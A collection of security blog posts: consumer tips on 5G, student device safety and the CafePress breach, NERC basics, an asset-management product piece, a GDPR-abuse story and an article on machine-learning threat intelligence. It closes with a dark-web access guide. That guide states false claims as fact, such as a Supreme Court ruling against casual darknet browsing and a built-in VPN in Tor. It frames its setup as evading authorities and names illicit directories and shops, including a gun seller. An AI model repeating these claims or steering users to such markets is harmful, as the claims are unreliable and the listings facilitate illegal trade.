In April 2019, Verizon was the first to launch a next-generation network, with other cellular carriers following closely behind. While a technological milestone in and of itself, some 5G networks are only available in select cities, even limited to just specific parts of the city. Beyond the not-so widespread availability of 5G, internet speeds of the network have performed at a multitude of levels depending on the cellular carrier. Even if users are located in a 5G-enabled area, if they are without a 5G-enabled phone they will not be able to access all the benefits the network provides. These three factors – user location, network limitation of certain wireless carriers, and availability of 5G-enabled smartphones – must align for users to take full advantage of this exciting innovation.

While there is still a lot of uncertainty surrounding the future of 5G, as well as what cyberthreats may emerge as a result of its rollout, there are a few things users can do to prepare for the transition. To get your cybersecurity priorities in order, take a look at our 5G preparedness toolkit to ensure you’re prepared when the nationwide roll-out happens:

  • Follow the news. Since the announcement of a 5G enabled network, stories surrounding the network’s development and updates have been at the forefront of the technology conversation. Be sure to read up on all the latest to ensure you are well-informed to make decisions about whether 5G is something you want to be a part of now or in the future.
  • Do your research. With new 5G-enabled smartphones about to hit the market, ensure you pick the right one for you, as well as one that aligns with your cybersecurity priorities. The right decision for you might be to keep your 4G-enabled phone while the kinks and vulnerabilities of 5G get worked out. Just be sure that you are fully informed before making the switch and that all of your devices are protected.
  • Be sure to update your IoT devices factory settings. 5G will enable more and more IoT products to come online, and most of these connected products aren’t necessarily designed to be “security first.” A device may be vulnerable as soon as the box is opened, and many cybercriminals know how to get into vulnerable IoT devices via default settings. By changing the factory settings, you can instantly upgrade your device’s security and ensure your home network is secure.
  • Add an extra layer of security.As mentioned, with 5G creating more avenues for potential cyberthreats, it is a good idea to invest in comprehensive mobile security to apply to all of your devices to stay secure while on-the-go or at home.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post How to Build Your 5G Preparedness Toolkit appeared first on McAfee Blogs.

What is NERC?

NERC CIP Standards Background and Basics The North American Electic Reliability Corporation (NERC) is an international regulatory organization that works to reduce risks to power grid infrastructure. They do this through the continual development of a set of regulatory standards in addition to education, training, and certifications for industry personnel. NERC Subcommittees NERC manages several […]… Read More

The post What is NERC? appeared first on The State of Security.

How Axonius integrates with Microsoft to help customers solve the cybersecurity asset management challenge

Despite the amazing and futuristic progression of technologies in cybersecurity, it’s still incredibly hard to answer the most basic of questions like: how many assets do I have, and do they adhere to my security policy? Somewhere along the line, asset management became very mundane compared to the other initiatives we’re responsible for in cybersecurity. Yet everything in cybersecurity lies on a foundation of understanding our devices, cloud instances, users, and the solutions that cover them.

So why is asset management—a problem that has persisted for decades—still an issue in 2019? Today, we look at why asset management remains a challenge, the Axonius approach to cybersecurity asset management, and how integrations with several Microsoft technologies are key to solving the problem and delivering value to organizations around the world.

The cybersecurity solution paradox

The more devices you have, the more solutions you implement to manage and secure them. Although one might think that the more security and management solutions at an organization the better, that’s not always the case. We call this the cybersecurity solution paradox: the idea that the more solutions you have, the harder it actually becomes to get answers to very basic questions. All of the information exists in separate silos, making it more difficult to aggregate the data, correlate it, and derive context and meaning.

Watch this short video outlining today’s asset management challenge.

The Axonius approach

If we were to outline an approach to asset management, we’d want a product to:

  1. Understand which assets are unmanaged—Those devices and cloud instances not being managed or secured by the tools outlined in our security policies.
  2. Understand which managed assets are missing agents—For example, which Windows 10 devices are missing an endpoint agent?
  3. Discover new devices—Any time a new device hits the network, we’d want to know whether it adheres to our security policies.
  4. Give context—If our security operations team gets an alert about a device, we would want to understand what the device is, what’s installed, its patch level, known vulnerabilities, which users have signed in, etc.

To get this information, a product would need to be very simple, agentless, and it would:

  1. Connect to every security and management solution that knows about assets.
  2. Collect and normalize all relevant asset and user information.
  3. Correlate the information to know that every asset is unique.
  4. Understand the relationship between users, devices, cloud instances, and the solutions that manage and secure them.

This is exactly the approach we took in building the Axonius cybersecurity asset management platform. By connecting to over 130 management and security solutions, Axonius is able to:

  • Give customers a credible, comprehensive asset inventory—We include every desktop, laptop, mobile device, virtual machine, server, cloud instance, and IoT device that is managed and unmanaged, cloud or on-premises.
  • Uncover security solution coverage gaps—Using pre-built and custom queries, customers can understand how every asset stacks up against their policies.
  • Automatically validate and enforce security policies—Customers can create automated enforcement sets to take action whenever assets do not adhere to their security policies.

Axonius is integrated with Microsoft Intune and Azure Active Directory (Azure AD), core products in the Microsoft Intelligent Security Association (MISA). To help customers better understand exactly what assets they have and whether their assets and users adhere to their security policies, Axonius builds upon Intune by connecting to networking gear itself to learn about assets that aren’t being managed. If your policy states that every mobile device needs to have another security or management solution, Axonius can easily identify those devices that aren’t being protected.

Let’s look at two specific examples that show how Axonius customers use integrations with Microsoft to solve their asset management challenges.

How Appsflyer uses Axonius for better asset management

When Guy Flechter, joined mobile attribution and analytics leader AppsFlyer in January 2018 as their chief information security officer, he began implementing a wide-ranging cybersecurity program to protect his heterogenous environment. After implementing the best security tools for every device type, the AppsFlyer team realized that they needed an automated way to ensure that every device had the required solutions installed, and that users had the correct permissions to adhere to the overall security policy.

“We needed an easy and automated way to have clear visibility into which agents were missing from each device, and a way to know when users had rights that conflicted with our security policies. For example, I want to immediately see all Windows devices missing an endpoint agent and unmanaged devices in various VLANs. These are really foundational elements of any cybersecurity program, and there were no good ways to get the answers,” said Flechter.

Using simple queries in Axonius, Flechter was able to get this level of visibility in minutes:

Moving from configuration manager to Intune: No device left behind

As part of their initiative to be nimble and cloud first, AppsFlyer wanted to move from on-premises Microsoft System Center Configuration Manager (ConfigMgr) to Intune, yet the team needed a way to make sure that no devices were left behind. Using queries from Axonius, Flechter was able to easily monitor the switch to Intune and could prioritize which assets should be moved and in what order. Watch this video to learn more.

Understanding user permissions

In addition to devices, Axonius customers are able to understand how each user compares to the overall security policy. Using information from Active Directory, Azure AD, and other IAM providers, customers are able to understand whenever a user account deviates from what is expected.

Example query showing users with bad configurations.

Learn more

To learn more about how the Axonius cybersecurity asset management platform and its many integrations with Microsoft and other leading security and management providers can help your organization, visit Axonius.com. Also, visit the MISA website to learn more about how top security companies are partnering with Microsoft to defend against increasingly sophisticated cyberthreats.

About Axonius

Axonius is the cybersecurity asset management platform that gives organizations a comprehensive asset inventory, uncovers security solution coverage gaps, and automatically validates and enforces security policies. By seamlessly integrating with more than 130 security and management solutions, Axonius is deployed in minutes, improving cyber hygiene immediately. Covering millions of devices at customers like the New York Times, Schneider Electric, and AppsFlyer, Axonius was named the Most Innovative Startup of 2019 at the prestigious RSAC Innovation Sandbox and was named Rookie Security Company of the Year by SC Magazine. For more visit Axonius.com.

 

 

The post How Axonius integrates with Microsoft to help customers solve the cybersecurity asset management challenge appeared first on Microsoft Security.

Dorms, Degrees, and Data Security: Prepare Your Devices for Back to School Season

With summer coming to a close, it’s almost time for back to school! Back to school season is an exciting time for students, especially college students, as they take their first steps towards independence and embark on journeys that will shape the rest of their lives. As students across the country prepare to start or return to college, we here at McAfee have revealed new findings indicating that many are not proactively protecting their academic data. Here are the key takeaways from our survey of 1,000 Americans, ages 18-25, who attend or have attended college:

Education Needs to Go Beyond the Normal Curriculum

While many students are focused on classes like biology and business management, very few get the proper exposure to cybersecurity knowledge. 80% of students have been affected by a cyberattack or know a friend or family member who has been affected. However, 43% claim that they don’t think they will ever be a victim of a cybercrime in the future.

Educational institutions are very careful to promote physical safety, but what about cyber safety? It turns out only 36% of American students claim that they have learned how to keep personal information safe through school resources. According to 42% of our respondents, they learn the most about cybersecurity from the news. To help improve cybersecurity education in colleges and universities, these institutions should take a certain level of responsibility when it comes to training students on how they can help keep their precious academic data safe from cybercriminals.

Take Notes on Device Security

Believe it or not, many students fail to secure all of their devices, opening them up to even more vulnerabilities. While half of students have security software installed on their personal computers, this isn’t the case for their tablets or smartphones. Only 37% of students surveyed have smartphone protection, and only 13% have tablet protection. What’s more, about one in five (21%) students don’t use any cybersecurity products at all.

Class Dismissed: Cyberattacks Targeting Education Are on the Rise

According to data from McAfee Labs, cyberattacks targeting education in Q1 2019 have increased by 50% from Q4 2018. The combination of many students being uneducated in proper cybersecurity hygiene and the vast array of shared networks that these students are simultaneously logged onto gives cybercriminals plenty of opportunities to exploit when it comes to targeting universities. Some of the attacks utilized include account hijacking and malware, which made up more than 70% of attacks on these institutions from January to May of 2019. And even though these attacks are on the rise, 90% of American students still use public Wi-Fi and only 18% use a VPN to protect their devices.

Become a Cybersecurity Scholar

In order to go into this school year with confidence, students should remember these security tips:

  • Never reuse passwords. Use a unique password for each one of your accounts, even if it’s for an account that doesn’t hold a lot of personal information. You can also use a password manager so you don’t have to worry about remembering various logins.
  • Always set privacy and security settings. Anyone with access to the internet can view your social media if it’s public. Protect your identity by turning your profiles to private so you can control who can follow you. You should also take the time to understand the various security and privacy settings to see which work best for your lifestyle.
  • Use the cloud with caution. If you plan on storing your documents in the cloud, be sure to set up an additional layer of access security. One way of doing this is through two-factor authentication.
  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to keep your connection secure.
  • Discuss cyber safety often. It’s just as important for families to discuss cyber safety as it is for them to discuss privacy on social media. Talk to your family about ways to identify phishing scams, what to do if you may have been involved in a data breach, and invest in security software that scans for malware and untrusted sites.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Dorms, Degrees, and Data Security: Prepare Your Devices for Back to School Season appeared first on McAfee Blogs.

Exploiting GDPR to Get Private Information

A researcher abused the GDPR to get information on his fiancee:

It is one of the first tests of its kind to exploit the EU's General Data Protection Regulation (GDPR), which came into force in May 2018. The law shortened the time organisations had to respond to data requests, added new types of information they have to provide, and increased the potential penalty for non-compliance.

"Generally if it was an extremely large company -- especially tech ones -- they tended to do really well," he told the BBC.

"Small companies tended to ignore me.

"But the kind of mid-sized businesses that knew about GDPR, but maybe didn't have much of a specialised process [to handle requests], failed."

He declined to identify the organisations that had mishandled the requests, but said they had included:

  • a UK hotel chain that shared a complete record of his partner's overnight stays

  • two UK rail companies that provided records of all the journeys she had taken with them over several years

  • a US-based educational company that handed over her high school grades, mother's maiden name and the results of a criminal background check survey.

CEO Cyber Quiz: What’s Your IT Security IQ?

Every business leader understands that, when it comes to cybersecurity, the stakes are extraordinarily high. CEOs tend to take notice when they read headlines about yet another big-name company being victimized by a massive data breach or about industry forecasts suggesting that the annual cost of crime losses and damage will hit $6 trillion by […]… Read More

The post CEO Cyber Quiz: What’s Your IT Security IQ? appeared first on The State of Security.

From unstructured data to actionable intelligence: Using machine learning for threat intelligence

The security community has become proficient in using indicators of compromise (IoC) feeds for threat intelligence. Automated feeds have simplified the task of extracting and sharing IoCs. However, IoCs like IP addresses, domain names, and file hashes are in the lowest levels of the threat intelligence pyramid; they are relatively easy to access and consume, but they’re also easy for attackers to change to evade detection. IoCs are not enough.

Tactics, techniques, and procedures (TTPs) can enable organizations to extract valuable insights like patterns of attack on an enterprise or industry vertical, or trends of attacker techniques in the overall ecosystem. However, TTPs are at the highest level of the threat intelligence pyramid; this information often comes in the form of unstructured texts like blogs, research papers, and incident response (IR) reports, and the process of gathering and sharing these high-level indicators has remained largely manual.

Automating the processing of unstructured text for threat intelligence can benefit threat analysts and customers alike. At my Black Hat session “Death to the IOC: What’s Next in Threat Intelligence“, I presented a system that automates this process using machine learning and natural language processing (NLP) to identify and extract high-level patterns of attack from unstructured text.

Figure 1. Basic structure of system

Trained on documentation of known threats, this system takes unstructured text as input and extracts threat actors, attack techniques, malware families, and relationships to create attacker graphs and timelines.

Data extraction and machine learning

In natural language processing, named entity extraction is a task that aims to classify phrases into pre-defined categories. This is usually a preprocessing step for other more complex tasks like identifying aliases, relationship extraction between actors and TTPs, etc. In our use case, the categories we want to identify are threat actors, malware families, attack techniques, and relationships between entities.

To train our model, our corpus was comprised of about 2,700 publicly available documents that describe the actions, behaviors, and tools of various threat actors. On average, each document in this corpus contained about two thousand tokens.

Figure 2. Training data distributions

We also see that the distribution of tokens that fall into one of our predefined categories is very low. On average, only 1% of the tokens are relevant entities. This tells us that we have class imbalance in our data.

Therefore, in addition to using traditional features that are common to natural language processing tasks (for example, lemma, part of speech, orthographic features), we experimented with using custom word embeddings, which allow the identification of relationships between two words that mean the same thing or are used in similar contexts.

Word embeddings are vector representations of words such that the semantic context in which a word appears is captured in the numeric vector. If two words mean the same thing, or are used in the same context frequently, then we would expect the cosine similarity of their word embedding vectors to be high. In other words, in a graphical representation, datapoints for words that mean the same thing or are used in the same context frequently would be relatively close together.

For example, we looked at some clusters of points formed around APT28 and found that the four closest points to it were either aliases (Sofacy, TG-4127) of the threat or were related by attribution (APT29, Dymalloy).

Figure 3. Tensorboard visualization of custom trained embeddings

We experimented with several models that are suited for a sequence labelling problem and measured performance in two ways—on the test dataset and on only the unseen tokens in the test dataset. We found that the experiments trained using conditional random fields (CRFs) trained on traditional and word embedding features have the best performance for both these scenarios.

Figure 4. Architecture of training pipeline for extractor system

Machine learning for insightful, actionable intelligence

Using the system we developed, we automatically extracted the techniques known to be used by Emotet, a prominent commodity malware family, as well as a spread of APT actors that public documents refer to as Saffron Rose, Snake, and Muddy Water, and generated the following graph, which shows that there is a significant overlap between some techniques used by commodity malware and those used by APTs.

Figure 5. Overlaps in techniques used by commodity malware and APTs

In this graph, we can see that techniques like obfuscated PowerShell, spear-phishing, and process hollowing are not restricted to APTs, but are prevalent in commodity malware. Insights like this can be used by organizations to guide security investments. Organizations can place defensive choke points to detect or prevent these attacker techniques so that they can stop not only annoying commodity malware, but also the high-profile targeted attacks.

At Microsoft, we are continuing to push the boundaries on how machine learning can improve the security posture of our customers. The output of machine learning-backed threat intelligence will show up in the effectiveness of the protection we deliver through Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) and the broader Microsoft Threat Protection.

In recent months, we have extensively discussed how we’re using machine learning to continuously innovate protections in Microsoft Defender ATP, particularly in hardening against evasion and adversarial attacks. In this blog we showed another application of machine learning: processing the vast amounts of threat intelligence that organizations receive and identifying high-level patterns. More importantly, we’re sharing our approaches so organizations can be inspired to explore more applications of machine learning to improve overall security.

 

Bhavna Soman (@bsoman3)
Microsoft Defender ATP Research

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

The post From unstructured data to actionable intelligence: Using machine learning for threat intelligence appeared first on Microsoft Security.

23M CafePress Accounts Compromised: Here’s How You Can Stay Secure

You’ve probably heard of CafePress, a custom T-shirt and merchandise company allowing users to create their own unique apparel and gifts. With a plethora of users looking to make their own creative swag, it’s no surprise that the company was recently targeted in a cybercriminal ploy. According to Forbes, CafePress experienced a data breach back in February that exposed over 23 million records including unique email addresses, names, physical addresses, phone numbers, and passwords.

How exactly did this breach occur? While this information is still a bit unclear, security researcher Jim Scott stated that approximately half of the breached passwords had been exposed through gaps in an encryption method called base64 SHA1. As a result, the breach database service HaveIBeenPwned sent out an email notification to those affected letting them know that their information had been compromised. According to Engadget, about 77% of the email addresses in the breach have shown up in previous breach alerts on HaveIBeenPwned.

Scott stated that those who used CafePress through third-party applications like Facebook or Amazon did not have their passwords compromised. And even though third-party platform users are safe from this breach, this isn’t always the case. With data breaches becoming more common, it’s important for users to protect their information as best as they can. Check out the following tips to help users defend their data:

  • Check to see if you’ve been affected. If you know you’ve made purchases through CafePress recently, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 23M CafePress Accounts Compromised: Here’s How You Can Stay Secure appeared first on McAfee Blogs.

How to Get on the Dark Web: A Step-by-Step Guide

Dark web, deep web, clear web – just words or more? Well, in seeing just how many of you are interested in hearing all about the dark wonders of the internet, I’ve decided to make this small dark web guide. So, if you want to learn all about Tor Onion, Silk Road, secret, hush-hush Governmental ops, and how to get on the dark web, of course, you came to the right place. Welcome to the shadows, my friends! I will be your guide.

WTH is the dark web anyway?

Now, before we dig into it, we’ll need to stage a little show-and-tell about the differences between the deep web, dark web, and clear net. I’ll start with the later because writer’s privilege. So, the clear web is the very first and very visible layer of the Internet. Basically, it’s what we see when we do a Google or Bing search for things like cat videos or popular YouTube songs.

From a technical standpoint, clear web defines the content that it’s indexed, crawled, and displayed by the various search engines. Unfortunately, the clear web accounts for approximately 4 percent of the Internet. So, if the clear web is only a very tiny portion of the Internet, what happened to the rest?

Thor Foresight makes sure that link is safe!
Your parents and friends will click any suspicious link, so make sure they're protected.
Thor Foresight Home anti malware and ransomware protection heimdal security
Thor Foresight provides: Automatic and silent software updates Smart protection against malware Compatibility with any traditional antivirus.

SECURE YOUR ONLINE BROWSING!

Get Thor Foresight

Deep web vs. dark web

Welcome to the deep web, the part of the Internet that’s not indexed by search engines. There’s nothing spooky about the deep web; it contains stuff like scientific white papers, medical records, tax-related info, PayPal subscriptions, army communique, and much more. Although the deep web’s hiding behind HTTPS forms, its contents can be accessed if you know what you’re looking for.

Most of the websites hosted on the dark web can be access on a credential basis. For instance, if your health provider has a website capable of displaying bloodwork tests online, that particular section will be hosted on the deep web – it will not be indexed by Google or Bing and can only be accessed via password.

Oh, nearly forgot to mention that the deep web accounts for about 90 percent of all Internet.

That’s about it about the clear web and the deep web.

Remember: Clear, Deep, and Dark.

What’s the dark web then? Well, if the clear web is Google’s BFF and the deep web, its secret lover, then the dark web can only be the evil twin or the oddball.

Accounting for 6 percent of the Internet, the dark web is a most peculiar blend – on the one hand, it’s a cesspool, a rendezvous place for drug dealers, black hat hackers, hitmen, and human traffickers. On the other hand, due to its covert nature (I’ll get to that in a sec), this Internet fold acts like a liaison between  political outcasts and people the free world. It’s also used by people who want to submit anonymous tips (whistleblowers).

The dark web is favored by both groups because of its ability to render anyone and anything invisible. Privacy and anonymity are what you might consider the core values of the darknet. There’s no such thing as a mother-server that hosts the entire dark web, but rather a swarm of servers and nodes that can only be accessed through onion-type links. So, what are those?

More on Tor Onions

Since everything’s decentralized on the dark web, there are no crawlers to bring together the information. Even the URLs, if we can call them that, are infinitely different from what we’re used to.

For instance, if you want to access a site like YouTube, all you need to do is to write the URL in the address bar (i.e. https://youtube.com) or search for the website using google.com. Now, on the dark web, you’ll have to know the URL right to the last decimal and character to access it. All dark web addresses contain seemingly random strings comprised of numbers and letters, followed by a .onion extension.

Again, we shouldn’t lose sight of the fact that the dark web’s the place where the bulk of criminal activities take place. Everything little sordid detail you heard over the news about the dark web is painfully true.

This is the place where hackers come to purchase data stolen from users or companies or offer their services in exchange for Bitcoins or other forms of cryptocurrency. More than that, if you dare to dig deep enough, you can uncover other hair-raising activities such as human trafficking, child pornography, torture, or murder on demand.

Charming little spot, isn’t it? Well, that’s where we’re heading. Now, before you can access the dark web, there a couple of things you must do, security-wise. Ready? Set? Go!

Preparing to set sail

Source: WikiHow

#1. Install a VPN

VPNs are a must when you’re attempting to access the dark web. Why? Because of the long arm of the law, of course. Technically, you are free to surf on this Internet layer, provided that you don’t engage in any illegal activities. However, a recent ruling by the US Supreme Court deemed that even casually browsing the darknet can get you in a lot of hot water.

This means that if the authorities would intercept your darknet connection request, they would have had enough reason to search your house and confiscate the machine used for browsing. So, do yourself a favor and download a VPN before messing about on the dark web. Need a hand picking one? Check out this article written by one of my colleagues to narrow down your search.

#2. Install an adequate browser

The first rule of the dark web – never, ever use your default browser to search for stuff on the darknet. Popular browsers like Chrome, Opera, or Firefox have tracking technologies that make you very visible on the authorities’ radar. So, if you’re still willing to do this, I would recommend you download Tor, which is, by far, the safest and easy-to-use onion browser.

Of course, there are others who would argue that Tor being made by the military for covert communication makes it unreliable, privacy-wise since it’s believed to be watched. I wouldn’t take that one for granted, but, then again, there’s no smoke without fire. It’s all up to you.

Of Tor, VPNs and other demons

Anyway, going back to Tor – why use this particular browser over a regular one? Well, that’s a rather long story, but worth telling nonetheless. As you know, a regular browser mediates between the user’s search request and the site about to be accessed. Normally, your query will go through the ISP’s DNS, which in turn consults other resources to help you get the answer you were looking for.

Now, with Tor, the search request kind of bounces around multiple Tor relays before completing your search request. You’re probably wondering about what the heck are Tor relays. Well, what we call the clear web is, in fact, a conglomerate of servers, which are managed either by companies or on volunteer-basis.

The same principle applies more or less to what we call the dark web. Since it’s the dark side of the Internet we’re dealing with here, secrecy and untraceability become inherent. Thus, the info’s stored on Tor relays which are managed by volunteers.

So, what happens when you want to access a dark web onion? First of all, if you followed my advice and installed a VPN, the tunneling signal will be encrypted. This means that your ISP won’t have a clue about what you’re about to search for. Sure, it can still see that you want to access a Tor node, but other than it’s blinder than a mole.

From there, it will be redirected to another node and then another one. Why does it do that? For anonymity reasons, of course; no breadcrumbs means that there’s no way for someone to trace the signal back to you.

VPN Only? Unlikely.

Congrats! You just took the first steps of your dark web journey. Still, there are a couple of more precautions you must take before you can pop open Pandora’s box of dark Internet wonders. Getting back to Tor and VPN.  There’s no broad consensus on dark web safety.

However, everyone tends to agree that using only Tor is not enough. The two of them (Tor and VPN) work in tandem and, as it happens, there are several ways of tunneling your way all the way through the dark web using this dynamic duo. Here’s what you need to know.

Method I – Tor over VPN

Sounds very techie, doesn’t it? Well, it’s really not that complicated – using the Tor over VPN method means connecting to a VPN service before using the Tor browser. Have to say that this is the most popular and safest method to access onion links, and, on my part, a marriage made in Heaven: Tor’s an excellent ‘anonymizer’, while VPN safeguards your privacy.

When using this method, Tor will encrypt your request, which will pass through your ISP unhindered. From there, it will go through a VPN server which conceals your IP and wipes geo-locations tags and other elements your Government or ISP might use to track the request.

Next step – your request will be transferred to Tor entry nod which in turn transfers to one or more Tor relays. From there, it gets slingshot to several Tor exit nodes. Afterwards,  your request will be matched with the appropriate website. Tricky, but effective; that’s why it’s, by far, the best method to access dark web content.

Source: NordVPN

Pros of using Tor over VPN:
  • Session logs are not stored (metadata, IP address).
  • Traffic’s completely encrypted.
Con(s):
  • Doesn’t offer protection against malicious Tor exit nodes.

Method II – VPN over Tor

Not very safe, but it’s still useable. Recall how Tor oven VPN works? Well, VPN over Tor is basically its opposite – instead of going through the VPN first, the signal passes through the Tor network, before going through the VPN. Why is this method so unpopular? Because it’s not as safe as Tor over VPN.

If the signal goes through the Tor network first, your ISP will be able to see that you are attempting to connect to a Tor node. Though no one should bat an eye just because you’re attempting to access the dark web, keep in mind that in some countries, like the United States, even a simple foray can get you in trouble.

Pro(s) of using VPN over Tor:
  • Great if you trust your ISP, but not the VPN provider.
  • Can bypass blocked Tor nodes.
Con(s):
  • ISP can see you trying to access onion content.
  • Susceptible to end-to-end timing attacks.

Now, if you want to see what lurks in the dark corners of the Internet but don’t really trust Tor, there are alternatives. Here is a couple of them:

  1. I2P – great privacy protection and can access hidden onion links.
  2. Matrix.org – an open-source project just like Tor. Great for IoT data transfers, chats, and WebRTC signaling.
  3. Orbot – basically a Tor for Android.
  4. Globus Secure Browser – paid Tor alternative. VPN-powered. Allows the users to select preferred geolocation. If you want to take it for a spin, Globus features a five-day trial period.
  5. Comodo Ice Dragon – Firefox offspin. Employs multiple malware safeguards. Open-source project.
  6. FreeNet – open-source project. Sports the Darknet and OpenNet anonymous browsing technologies.

#3. Install a VM or disposable OS

I strongly recommend surfing on the dark web using virtual machine software instead of your locally installed Windows. Why? Because it’s easier to contain malware in a virtual environment, which can be fully controlled.

It’s like in those movies where the doctors are experimenting on deadly viral strains from behind the safety of a glass enclosure. And, as it happens, there are plenty of VMs to choose from:  Oracle VM Virtualbox, VMware Fusion and Workstations, QEMU, Red Hat Virtualization, Microsoft Hyper-V, Citrix XenServer, and Xen Project, just to name a few.

Now, if you really want to take the physical storage devices out of the equation, you can use what I like to call a disposable operating system – easy to deploy and to get rid of if you by chance you run into any trouble. All you’ll need is an 8GB thumb drive, an installation package, and a couple of minutes to get things up and running.

Let’s dig in.

How to install Tails OS

Source: TechSpot

Step 1. Get yourself a thumb drive; 8GB will do, but you can buy one with more space if you plan on using it for anything else. Nothing will happen to the stick (probably).

Step 2. Hop on the web and download the installation package for Tails OS.

Note: Tails is a Linux-based live operating system which can be booted from a USB stick or DVD. I recommend using a stick since DVDs have a read-only function after you’re done burning well and accessing the dark web required a bit of writing.

Chill, because nobody will ever find a record of you ever fiddling around the darknet. Note that Tails’ installation package is the .img format, which means that you’ll need software capable of burning images on your thumb drive.

My recommendation is Universal USB Installer, which is very intuitive. You can also go along with Rufus. The choice is yours. For this tutorial, I’ve used Universal.

Step 3. Insert the stick and do a quick format. Be sure to use FAT32 to root out any compatibility issues. Shouldn’t take longer than a few seconds.

Step 4. Download and install Universal USB Installer or Rufus.

Step 5. Fire up Universal USB or Rufus.

Step 6. Under “Step 1: Select a Linux Distribution from the dropdown to put on your USB” select Tails.

Step 7. Under “Step 2: Select your ubuntu*desktop*.iso”, click on the browse button and select the downloaded Tails .img file.

Step 8. Under “Step 3: Select your USB Flash Drive Letter Only”, use the dropdown box to select your thumb drive’s letter. If it doesn’t show up, check the “now showing all drives” option.

Step 9. Review the info and hit Create when you’re done.

Note that the process can take anywhere from 5 to 30 minutes depending on your machine. Sit back, relax, and wait until the installation’s done. When you’re ready, hit the Close button and you’re all set.

Now what? Well, now it’s time to fire up Tails and do a little bit of tinkering.

How to boot from USB and configure Tails

Bogged about your first boot? No worries. It always hurts the first time. Just follow these steps.

  1. Keep the thumb drive in the USB.
  2. Restart your computer.
  3. After the splash screen appears, press the appropriate Boot Menu key. If you’re tired of randomly pressing keys each time you perform this action, check out this article on hotkeys for the boot menu.
  4. Use your keyboard to select the corresponding drive letter. When you’re done, hit Enter.
  5. Wait for Tails OS to boot. Since this is the first time, it may take a while. Just be patient.
  6. Configure Tails and deploy Tor + VPN. Yes, the latest version of The Onion Router has an in-built VPN.
  7. Get ready to discover the dark and sometimes creepy wonders of the dark web.

So how do you get on the dark web?

All done installing and configuring Tor? Great! Fire it up and let’s surf. At first glance, Tor doesn’t look that different from your regular browser – it has a search bar, lots of quick-launch icons, the peeled onion icon smack in the middle of the screen. So, now what? Well, let’s start small.

Although content on the dark web is not as ‘indexed’ compared to the one on the clear web, you can still use search engines to find stuff. The Hidden Wiki and Grams are the heavyweights here.

Yay, now I found everything my heart longs for. Not quite: since the dark web relies on privacy and anonymity, search engines like the Wiki and Grams frequently return false results. No matter – good or not, the Hidden Wiki is a great place to start exploring.

The Hidden Wiki & Co.

Think of the Hidden Wiki as Wikipedia’s evil twin – looks more or less the same, but contains links to various dark web categories: editor’s picks, volunteer, introduction points, financial services, commercial services, email\messaging, drugs (yes, it’s the real deal), blogs & essays, hosting providers, hacking services, darknet radio (nothing shady about that; just some weird electronic tunes and, occasionally, a bit of jazz), literature (mostly resources on hacking, both ethical and black hat).

You can also find quick links here to the stuff that makes the dark web pitch-black dark: contract killers, rape, torture, or murder on demand, child pornography.

Fortunately, in Hidden Wiki, every website is followed by a brief description so that the user knows what to expect (or not). My advice to you would be to stick with the editor’s pick. You can also take a look at the blogs & essays section if you want to find some nifty coding resources.

If you’re feeling chatty, you can always access a chat room. Services like Random Chat connects you with random people using the same service. What happens after that, it’s all to you.

You should stay away from everything labeled “porn”, “card skimming services”, “PayPal hacks”, “firearms”, “real fake IDs and passports”. Believe me – there plenty to go around and each and every one of them are being kept under surveillance, not to mention the fact that you’ll get exposed to some stuff that will definitely make you take several cold showers.

Hidden Wiki’s not the only search engine online. Here are a couple of alternatives in case you get bored with Wiki.

  • DuckDuckGo – also available on the clear web. The best thing about DuckDuckGo is that it doesn’t track your searches. One can say that it’s the Google of the dark web.
  • Torch – considered the first dark web search engine, Torch boasts a database of several million onions links. Works just like Yelp. It even comes with recommendations, although most of them append websites like the infamous Silk Road.
  • WWW Virtual Library – if Torch and Hidden Wiki are old, the triple-W Virtual Library is Cthulhu-old; as in the elder god of search engines. What’s even better is the fact the WWW Virtual Library contains info dating back to the beginning of the Internet: logs, documents, pictures, and everything in between.

Fun fact: The Virtual Library was founded and, for a very long time, curated by none other than Tim Berners-Lee, the George Washington of the Internet. So, if you’re looking for obscure Internet facts, very old documents, Berners-Lee’s brainchild is the way to go.

  • Uncensored Hidden Wiki – think regular Hidden Wiki is bad? Wait till you see the uncensored version. As the name suggests, it emphasizes very illegal activities like human trafficking, drugs, pornography went wrong, and other things that fester in the dark corners of the human mind.
  • ParaZite – do you know the “want to get Lucky?” button in Google’s search engine? The one that takes you on a random clear web site? Well, ParaZite does the same thing. Sure, you can use it like any run-of-the-mill search engine, but if you’re feeling curious, you can also try the “feeling (un)lucky” feature. Proceed with caution and prepare to eject and torch the thumb drive.

Commercial Services

Believe it or not, the dark web even has online shops. And no, they don’t all sell drugs or firearms. Some of them are, reportedly, legit and have great bargains. For instance, if you want to buy a laptop or a smartphone, you can try your luck in one of these shops. Of course, all transactions are anonymous and Bitcoin-driven. Sure, you can use other cryptocurrencies if Bitcoin’s not your cup of tea.

The major issue with these websites is that a whopping 50 percent are fake, and there’s no way of telling for sure if they’ll deliver or not. By the way, most have shipping services.

Of course, you can’t use your home address for dark web drop-offs, but apparently, they can ship all over the world, minus some Middle Eastern countries and North Korea. To tell you the truth, I was tempted into purchasing a Samsung Galaxy S10 Plus; it was only 250 bucks. My advice: look, but don’t touch (buy).

Here are a couple of commercial services you can check out while you’re browsing the dark web:

  • CStore – any kind of electronics. You can make the purchases in cryptocurrency or gift cards. They even accept full escrow.
  • Apple Palace – everything Apple: laptops, desktops, phones, and accessories. All at ludicrously low prices.
  • EuroGuns – the name says it all: guns sold on the European market. The website even boasts that it’s the number one European arms dealer.
  • Kamagra for Bitcoins – if your boomstick ain’t working no more, you can try Kamagra, which is the dark web and cheap version of Viagra.
